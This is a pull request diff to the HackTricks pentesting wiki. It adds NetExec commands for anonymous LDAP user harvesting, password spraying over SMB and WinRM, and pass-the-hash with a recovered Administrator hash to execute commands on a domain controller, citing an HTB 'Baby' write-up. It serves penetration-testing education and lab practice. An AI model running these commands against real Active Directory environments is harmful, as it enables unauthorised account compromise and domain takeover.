Merge pull request #1422 from HackTricks-wiki/update_HTB__Baby___Anonymous_LDAP___Password_Spray___SeBa_20250919_124219

HTB Baby — Anonymous LDAP → Password Spray → SeBackupPrivile...

src/network-services-pentesting/pentesting-ldap.md

@@ -93,6 +93,33 @@ ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
 [LDAP anonymous binds](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) allow **unauthenticated attackers** to retrieve information from the domain, such as a complete listing of users, groups, computers, user account attributes, and the domain password policy. This is a **legacy configuration**, and as of Windows Server 2003, only authenticated users are permitted to initiate LDAP requests.\
 However, admins may have needed to **set up a particular application to allow anonymous binds** and given out more than the intended amount of access, thereby giving unauthenticated users access to all objects in AD.
 
+### Anonymous LDAP enumeration with NetExec (null bind)
+
+If null/anonymous bind is allowed, you can pull users, groups, and attributes directly via NetExec’s LDAP module without creds. Useful filters:
+- (objectClass=*) to inventory objects under a base DN
+- (sAMAccountName=*) to harvest user principals
+
+Examples:
+
+```bash
+# Enumerate objects from the root DSE (base DN autodetected)
+netexec ldap <DC_FQDN> -u '' -p '' --query "(objectClass=*)" ""
+
+# Dump users with key attributes for spraying and targeting
+netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" ""
+
+# Extract just the sAMAccountName field into a list
+netexec ldap <DC_FQDN> -u '' -p '' --query "(sAMAccountName=*)" "" \
+  | awk -F': ' '/sAMAccountName:/ {print $2}' | sort -u > users.txt
+```
+
+What to look for:
+- sAMAccountName, userPrincipalName
+- memberOf and OU placement to scope targeted sprays
+- pwdLastSet (temporal patterns), userAccountControl flags (disabled, smartcard required, etc.)
+
+Note: If anonymous bind is not permitted, you’ll typically see an Operations error indicating a bind is required.
+
 ## Valid Credentials
 
 If you have valid credentials to login into the LDAP server, you can dump all the information about the Domain Admin using:
@@ -300,13 +327,13 @@ You can download **pbis** from here: [https://github.com/BeyondTrust/pbis-open/]
 ./list-groups-for-user <username>
 ./lsa list-groups-for-user <username>
 #Get groups of each user
-./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
+./enum-users | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
 
 #Get users of a group
 ./enum-members --by-name "domain admins"
 ./lsa enum-members --by-name "domain admins"
 #Get users of each group
-./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
+./enum-groups | grep "Name:" | sed -e "s,\\,\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
 
 #Get description of each user
 ./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
@@ -428,6 +455,10 @@ Entry_7:
     Command: nxc ldap <IP> -u <USERNAME> -p <PASSWORD> --bloodhound -c All -d <DOMAIN.LOCAL> --dns-server <IP> --dns-tcp
 ```
 
-{{#include ../banners/hacktricks-training.md}}
+## References
 
+- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
+- [NetExec (CME successor)](https://github.com/Pennyw0rth/NetExec)
+- [Microsoft: Anonymous LDAP operations to Active Directory are disabled](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled)
 
+{{#include ../banners/hacktricks-training.md}}

src/windows-hardening/active-directory-methodology/password-spraying.md

@@ -44,6 +44,23 @@ crackmapexec smb <IP> -u users.txt -p passwords.txt
 crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
 ```
 
+- Using **NetExec (CME successor)** for targeted, low-noise spraying across SMB/WinRM:
+
+```bash
+# Optional: generate a hosts entry to ensure Kerberos FQDN resolution
+netexec smb <DC_IP> --generate-hosts-file hosts && cat hosts /etc/hosts | sudo sponge /etc/hosts
+
+# Spray a single candidate password against harvested users over SMB
+netexec smb <DC_FQDN> -u users.txt -p 'Password123!' \
+  --continue-on-success --no-bruteforce --shares
+
+# Validate a hit over WinRM (or use SMB exec methods)
+netexec winrm <DC_FQDN> -u <username> -p 'Password123!' -x "whoami"
+
+# Tip: sync your clock before Kerberos-based auth to avoid skew issues
+sudo ntpdate <DC_FQDN>
+```
+
 - Using [**kerbrute**](https://github.com/ropnop/kerbrute) (Go)
 
 ```bash
@@ -265,6 +282,7 @@ To use any of these tools, you need a user list and a password / a small list of
 - [www.blackhillsinfosec.com/?p=5296](https://www.blackhillsinfosec.com/?p=5296)
 - [https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying](https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying)
 - [HTB Sendai – 0xdf: from spray to gMSA to DA/SYSTEM](https://0xdf.gitlab.io/2025/08/28/htb-sendai.html)
+- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
 
 
 {{#include ../../banners/hacktricks-training.md}}

src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md

@@ -141,6 +141,16 @@ reg save HKLM\SAM SAM.SAV
 secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
 ```
 
+5. Post-extraction: Pass-the-Hash to DA
+
+```bash
+# Use the recovered Administrator NT hash to authenticate without the cleartext password
+netexec winrm <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> -x "whoami"
+
+# Or execute via SMB using an exec method
+netexec smb <DC_FQDN> -u Administrator -H <ADMIN_NT_HASH> --exec-method smbexec -x cmd
+```
+
 #### Using wbadmin.exe
 
 1. Set up NTFS filesystem for SMB server on attacker machine and cache SMB credentials on the target machine.
@@ -313,9 +323,7 @@ Get-NetGroupMember -Identity "Server Operators" -Recurse
 - [https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys](https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys)
 - [https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e](https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e)
 - [https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html](https://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FNtLoadDriver.html)
+- [HTB: Baby — Anonymous LDAP → Password Spray → SeBackupPrivilege → Domain Admin](https://0xdf.gitlab.io/2025/09/19/htb-baby.html)
 
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}
-
-
-